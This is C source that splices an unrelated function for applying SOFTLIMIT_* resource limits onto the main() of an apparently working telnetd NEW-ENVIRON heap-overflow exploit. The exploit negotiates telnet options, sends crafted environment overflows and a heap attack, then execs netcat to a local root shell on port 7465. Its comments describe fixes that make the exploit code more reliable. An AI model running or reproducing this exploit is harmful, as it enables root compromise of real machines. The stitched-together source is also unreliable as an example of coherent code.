/*
 * Apply every SOFTLIMIT_* environment variable that names a resource this
 * platform's <sys/resource.h> defines.  The actual work is delegated to
 * doenv() (defined elsewhere; presumably reads the named variable and
 * applies it to the given resource — confirm against its definition).
 *
 * Entries are visited strictly in table order, which is the same order as
 * the original straight-line call sequence: the resource-specific variable
 * first, then the umbrella SOFTLIMIT_MEMBYTES for the memory-sized
 * resources.  How doenv() reconciles two calls for the same resource is not
 * visible here, so that order is deliberately preserved.
 */
static void doallenv(void)
{
  static const struct {
    int resource;       /* RLIMIT_* constant */
    const char *var;    /* environment variable to consult; 0 ends the table */
  } table[] = {
#ifdef RLIMIT_AS
    { RLIMIT_AS,      "SOFTLIMIT_ALLBYTES" },
    { RLIMIT_AS,      "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_VMEM
    { RLIMIT_VMEM,    "SOFTLIMIT_ALLBYTES" },
    { RLIMIT_VMEM,    "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_CORE
    { RLIMIT_CORE,    "SOFTLIMIT_COREBYTES" },
#endif
#ifdef RLIMIT_DATA
    { RLIMIT_DATA,    "SOFTLIMIT_DATABYTES" },
    { RLIMIT_DATA,    "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_FSIZE
    { RLIMIT_FSIZE,   "SOFTLIMIT_FILEBYTES" },
#endif
#ifdef RLIMIT_MEMLOCK
    { RLIMIT_MEMLOCK, "SOFTLIMIT_LOCKEDBYTES" },
    { RLIMIT_MEMLOCK, "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_STACK
    { RLIMIT_STACK,   "SOFTLIMIT_STACKBYTES" },
    { RLIMIT_STACK,   "SOFTLIMIT_MEMBYTES" },
#endif
#ifdef RLIMIT_NOFILE
    { RLIMIT_NOFILE,  "SOFTLIMIT_OPENFILES" },
#endif
#ifdef RLIMIT_OFILE
    { RLIMIT_OFILE,   "SOFTLIMIT_OPENFILES" },
#endif
#ifdef RLIMIT_NPROC
    { RLIMIT_NPROC,   "SOFTLIMIT_PROCS" },
#endif
#ifdef RLIMIT_RSS
    { RLIMIT_RSS,     "SOFTLIMIT_RSSBYTES" },
#endif
#ifdef RLIMIT_CPU
    { RLIMIT_CPU,     "SOFTLIMIT_CPUSECS" },
#endif
    { 0, (const char *) 0 }   /* sentinel; also keeps the array non-empty */
  };
  const char *var;
  int i;

  for (i = 0; (var = table[i].var) != 0; i++)
    doenv(table[i].resource, var);
}
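/*
 * Entry point: drives the telnet NEW-ENVIRON overflow sequence against the
 * peer that sock_setup() (not shown) connects to, then execs netcat to the
 * local port the payload is expected to open.
 *
 * Options:
 *   --pause       list in.telnetd processes via the shell and wait 8 s first
 *   --size N      set the global mipl (decimal, non-negative int)
 *   --name NAME   use strlen(NAME) for dalen instead of strlen("clarity.local")
 *
 * Everything below relies on globals and helpers defined elsewhere in the
 * file (oldenv, mipl, dalen, offsets, offset3, ninbufoffset, dasock, tosend,
 * ENV, sock_setup, doo, will, wont, read_sock, push_clean, doenv, fill,
 * push_heap_attack); their contracts are not visible in this listing.
 * Note that doenv() here takes a name and a value string.
 *
 * Fixes versus the original: explicit `int` return type (implicit int is
 * not C99), a real null pointer terminating the execlp() list, a format
 * string that actually consumes its arguments, validated --size input, and
 * a perror() when the exec fails.
 */
int
main (int argc, char *argv[])
{
  int br;
  int dosleep = 0;

  (void) argc;
  memset (oldenv, 0, sizeof (oldenv));
  dalen = strlen ("clarity.local");

  /* Option parsing: a flag that takes a value consumes argv[1] as well. */
  argv++;
  while (argv[0])
    {
      if (!strcmp (argv[0], "--pause"))
        dosleep = 1;
      if (!strcmp (argv[0], "--size") && argv[1])
        {
          /* strtol rather than atoi: reject junk or trailing garbage instead
             of silently using 0 as the size.  mipl is printed with %d below,
             so it must also survive the round trip through int. */
          char *end = argv[1];
          long v = strtol (argv[1], &end, 10);
          if (end == argv[1] || *end != '\0' || v < 0 || (long) (int) v != v)
            {
              fprintf (stderr, " ! Bad --size value: %s\n", argv[1]);
              exit (1);
            }
          mipl = (int) v;
          argv++;
        }
      if (!strcmp (argv[0], "--name") && argv[1])
        {
          dalen = strlen (argv[1]);
          argv++;
        }
      argv++;
    }

  fprintf (stderr, " o MiPl of %4d o NameLen of %2d\n", mipl, dalen);

  /* Choose the offset table.  A name length that is a multiple of 3 selects
     the precomputed offset3 table; otherwise slot 11 of the default table is
     bumped by 32 per whole 8 KiB page of mipl and must still fit in a byte
     (the why behind these constants is not visible here). */
  if (dalen % 3 == 0)
    {
      offsets = offset3;
    }
  else
    {
      ninbufoffset = mipl % 8192;
      offsets[11] += 32 * (mipl - ninbufoffset) / 8192;
      if (offsets[11] > 255)
        {
          /* The original format string had no conversions for its two
             arguments and no newline. */
          fprintf (stderr, " ! MiPl too big (mipl=%d, namelen=%d).\n", mipl, dalen);
          exit (1);
        }
    }

  sock_setup ();

  if (dosleep)
    {
      /* Debug aid only: a fixed command string, so no injection surface, but
         it runs through the shell and depends on PATH, ps and grep. */
      if (system ("sleep 1;ps aux|grep in.telnetd|grep -v grep") == -1)
        perror ("system");
      sleep (8);
    }

  dalen += strlen ("\r\n[ : yes]\r\n");

  /* Telnet option codes: 39 is NEW-ENVIRON (per the status message); the
     others (1, 5, 24, 32, 35) are standard IANA telnet option numbers. */
  fprintf (stderr, "o Sending IAC WILL NEW-ENVIRONMENT...\n");
  fflush (stderr);
  doo (5);
  will (39);
  fflush (dasock);
  read_sock ();

  fprintf (stderr, "o Setting up environment vars...\n");
  fflush (stderr);
  will (1);
  push_clean ();
  doenv ("USER", "zen-parse");
  doenv ("TERM", "zen-parse");
  will (39);
  fflush (dasock);

  fprintf (stderr, "o Doing overflows...\n");
  fflush (stderr);
  /* offsets is a flat list of (offset, length) pairs terminated by two
     zeros; each pair drives one fill() relative to mipl + ENV, with a short
     pause and a read of the peer's reply between them. */
  for (br = 0; offsets[br] || offsets[br + 1]; br += 2)
    {
      fill (mipl + ENV + offsets[br], offsets[br + 1]);
      fflush (dasock);
      usleep (100000);
      read_sock ();
    }
  fprintf (stderr, "o Overflows done...\n");
  fflush (stderr);
  push_clean ();

  fprintf (stderr, "o Sending IACs to start login process...\n");
  fflush (stderr);
  wont (24);
  wont (32);
  wont (35);
  fprintf (dasock, "%s", tosend);
  will (1);
  push_heap_attack ();
  sleep (1);

  fprintf (stderr, "o Attempting to lauch netcat to localhost rootshell\n");
  /* The variadic exec list must end in a null *pointer*.  A bare 0 is an
     int, which is undefined behaviour wherever int and char * differ in size
     (LP64).  nc is resolved through PATH. */
  execlp ("nc", "nc", "-v", "localhost", "7465", (char *) NULL);

  /* Only reached when the exec itself failed (e.g. nc not on PATH). */
  perror ("execlp nc");
  fprintf (stderr, "o If the exploit worked, there should be an open port on 7465.\n");
  fprintf (stderr, "  It is a root shell. You should probably close it.\n");
  fflush (stderr);
  sleep (60);
  exit (0);
}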